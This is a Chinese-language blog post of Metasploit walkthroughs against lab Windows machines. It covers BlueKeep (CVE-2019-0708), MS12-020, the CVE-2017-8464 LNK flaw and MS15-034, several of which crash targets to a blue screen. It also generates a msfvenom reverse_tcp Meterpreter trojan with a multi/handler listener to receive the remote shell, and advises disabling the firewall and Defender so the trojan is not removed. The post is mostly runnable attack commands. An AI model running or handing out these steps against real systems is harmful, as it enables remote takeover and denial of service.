Msf攻击案例

2020-03-17  本文已影响0人  JyinP

注意:所有攻击前先要管防火墙!

msf 之ms10-087

输入命令

msfCVE-2019-0708实例

search 2019-0708
use 1
show options(查看使用说明)
set rdp_client_ip 192.168.117 (设置当前ip是被攻击的主机ip)


image.png
image.png

show options
set payload windows/x64/meterpreter/reverse_tcp #设置反向链接


image.png

set lhost 192.168.1.119
set id 4


image.png

exploit
set rhosts 192.168.1.117 (设置被攻击主机号)
exploit
check
set target 1
exploit (目标会蓝屏)成功导致被攻击的主机蓝屏

image.png
msfCVE-2019-0708实例

ms12-020

search ms12-020
use 0
set rhosts 192.168.1.124 (攻击2003系统)
exploit(蓝屏)


image.png
震网三代

search 2017_8464
use 0
show options
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.1.117
run/exploit

生成很多快捷方式,找到快捷方式可以存到U盘,可以单独拷贝出来有漏洞。


image.png
image.png

命令如下:
kail下操作
kail:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.119 LPORT=4444 -f exe -o payload.exe(生成木马)


image.png

kail:sz payload.exe 下载木马到桌面,此处踩坑——木马被查杀。
注意!踩坑:
尽管关闭了防火墙,但是生成的木马病毒被win10系统自带的查杀病毒给消灭了,关闭方式如下。


image.png
image.png
image.png
image.png

进入到msf下,
1.开启监听444端口:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.119
set lport 4444
exploit
当win7下点击木马,就可以监听运行

image.png
ms15-034

(windows2008系统下运行)
现在windows sever 2008 r2 系统下安装iis 方法参考
[win2008系统创建iis流程]https://www.jianshu.com/p/44c503ed447d

image.png

ms15-034
search ms15-034
use 0
set rhosts 192.168.1.4(win2008系统ip) 出现蓝屏重启

操作如下:
设置iis


image.png

更改为ip自动获取


image.png image.png
上一篇 下一篇

猜你喜欢

热点阅读